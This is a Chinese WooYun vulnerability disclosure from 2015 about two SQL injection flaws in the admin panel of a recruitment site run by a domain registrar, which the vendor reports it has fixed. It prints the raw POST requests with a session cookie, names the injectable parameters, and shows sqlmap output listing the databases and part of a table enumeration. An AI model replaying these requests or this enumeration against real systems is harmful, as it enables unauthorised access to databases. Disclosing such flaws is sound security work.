当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134820

漏洞标题:域名商安全之时代互联某站root权限MySQL俩处注射(差一点杀入后台)

相关厂商:广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间:2015-08-17 22:47

修复时间:2015-09-16 09:30

公开时间:2015-09-16 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

注入,厂商忽略,我就伤心了!!!

详细说明:

POST /admin.php/hr/hrlist_edit_submit HTTP/1.1
Content-Length: 123
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
id[]=&interviewdate=01/01/1967&interviewnoon=%e4%b8%8a%e5%8d%88&interviewtime=1&submit=%e6%8f%90%e4%ba%a4%e5%8f%91%e9%80%81


注入参数id[]


POST /admin.php/article/opt HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: 
ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTr
ZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc
%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL
%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV
%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT
%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck
%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F
%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu
%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=del_allheckbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c


注入参数 checkbox[]


1.jpg


2.jpg


3.jpg


available databases [9]:
[*] #mysql50#lost+found
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_center



看当前的库巴!

mask 区域 
*****ve value(s) fou*****
*****uery used retu*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_3431_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_343*****
*****eved: np_343*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_3431_p*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_456_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_456*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_456_pr*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_888_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_888*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_888_pr*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_aat*****
*****rieved: np_*****
*****ed: np_aatkq_*****
*****rieved: np_*****
*****eved: np_aat*****
*****eved: np_aat*****
*****eved: np_aat*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_aatkq_*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_air_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_air*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_air_pr*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****: np_armies2_a*****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****eved: np_arm*****
*****rieved: np_*****
*****eved: np_arm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_arm*****
*****: np_armies2_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_arm*****
*****rieved: np_*****
*****ed: np_armies*****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****eved: np_arm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_armies*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_asia_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_asi*****
*****eved: np_asi*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_asia_p*****
*****etrieved: *****
*****eved: np_blu*****
*****ed: np_bluesp*****
*****eved: np_blu*****
*****: np_bluesprin*****
*****eved: np_blu*****
*****ed: np_bluesp*****
*****ed: np_bluesp*****
*****ed: np_bluesp*****
*****eved: np_blu*****
*****eved: np_blu*****
*****eved: np_blu*****
*****rieved: np_*****
*****eved: np_blu*****
*****eved: np_blu*****
*****: np_bluesprin*****
*****eved: np_blu*****
*****eved: np_can*****
*****eved: np_can*****
*****eved: np_can*****
*****: np_canyin007*****
*****eved: np_can*****
*****eved: np_can*****
*****ed: np_canyin*****
*****ed: np_canyin*****
*****eved: np_can*****
*****eved: np_can*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_can*****
*****: np_canyin007*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_car*****
*****rieved: np_*****
*****ed: np_car4s_*****
*****rieved: np_*****
*****eved: np_car*****
*****eved: np_car*****
*****eved: np_car*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_car4s_*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****: np_cgmacau_a*****
*****rieved: np_*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****rieved: np_*****
*****eved: np_cgm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cgm*****
*****: np_cgmacau_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_chi*****
*****rieved: np_*****
*****ed: np_chile_*****
*****rieved: np_*****
*****eved: np_chi*****
*****eved: np_chi*****
*****eved: np_chi*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_chile_*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_cogi_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cog*****
*****eved: np_cog*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_cogi_p*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cor*****
*****eved: np_cor*****
*****: np_corecool_*****
*****eved: np_cor*****
*****eved: np_cor*****
*****ed: np_coreco*****
*****eved: np_cor*****
*****eved: np_cor*****
*****eved: np_cor*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cor*****
*****: np_corecool_*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_cuhk_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cuh*****
*****eved: np_cuh*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_cuhk_p*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****: np_cwjyp014_*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****ed: np_cwjyp0*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cwj*****
*****: np_cwjyp014_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dac*****
*****eved: np_dac*****
*****: np_dacarat_a*****
*****rieved: np_*****
*****eved: np_dac*****
*****eved: np_dac*****
*****eved: np_dac*****
*****rieved: np_*****
*****eved: np_dac*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dac*****
*****: np_dacarat_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dds*****
*****eved: np_dds*****
*****: np_ddsdfsfs_*****
*****eved: np_dds*****
*****eved: np_dds*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****


5.jpg


>>>>多到sqlmap放不下了<<<<<


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-18 12:57

厂商回复:

我们会尽快修复,感谢白帽子哥哥提供的漏洞, ^_^

最新状态:

2015-09-16:已修复